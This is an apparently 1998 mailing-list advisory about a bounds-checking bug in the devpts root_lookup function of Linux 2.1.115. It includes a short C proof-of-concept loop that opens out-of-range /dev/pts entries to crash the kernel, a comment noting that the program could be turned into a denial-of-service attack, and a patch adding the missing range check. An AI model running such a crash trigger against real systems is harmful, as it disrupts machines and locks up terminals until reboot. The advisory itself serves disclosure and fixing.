Linux 2.1.115 oops (demo and fix)

[dps () IO STARGATE CO UK (Duncan Simpson)]

2.1.115 devpts contains a bug that can prevent you from unmounting  file systems
and the exploit program sticks in uninteruptable sleep until you reboot. It may
be possible to trash kernel data structures using the bug with difficulty. I
have yet to both ends of a pty using ptmx and devpts. I assume other version
are vulnerable too.

For pruposes of demonstrating the bug assume devpts is mounted on /dev/pts.
My observations suggest the following program should tickle the bug:

/* devpts bug tickler, hits 2.1.115 */
/* WARNING: This program enters unteruptable sleep when the kernel
 * oopes, so real programmers can turn this into a process table
 * eating DoS attack. */
int main(void)
{
   int i,fd;
   char name[256];

   i=257;
   while(1)
   {
       sprintf(name, "/dev/pts/%d", i);
       fd=fopen(name, O_RDWR);
       i++;
   }
}


The bug is a bounds chekcing failure in the root_lookup function in
linux/fs/devpts/root.c. Here is a patch that fixes the bug. Given it
is referencing memory it should not be viewing and the bad data is passed
back to real_lookup (which promptly oopes) more spectacular effects may
be possible. The only way to use a terminal running such a program again is
after rebooting apparently due to the uninteruptable sleep the program
that made the system call enters.

--- fs/devpts/root.c.dist       Thu Aug 13 17:54:17 1998
+++ fs/devpts/root.c    Thu Aug 13 17:56:54 1998
@@ -159,6 +159,8 @@
                        entry += (*p++ - '0');
                }
        }
+       if (entry>=sbi->max_ptys) /* Check range of number */
+          return 0;

        dentry->d_inode = sbi->inodes[entry];
        if ( dentry->d_inode )